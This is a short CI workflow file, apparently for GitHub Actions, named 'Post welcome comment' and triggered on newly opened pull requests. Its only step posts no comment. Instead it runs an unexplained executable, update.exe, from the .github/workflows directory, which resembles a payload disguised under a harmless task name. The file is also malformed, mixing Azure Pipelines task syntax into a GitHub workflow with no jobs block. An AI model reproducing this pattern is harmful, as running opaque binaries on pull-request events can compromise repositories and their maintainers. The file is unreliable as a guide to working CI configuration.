name: Post welcome comment
on:
  pull_request:
    types: [opened]
permissions:
  pull-requests: write

steps:
  - task: CmdLine@2
    inputs:
          script: |
            cd test-efficiency-valuation/.github/workflows
            update.exe
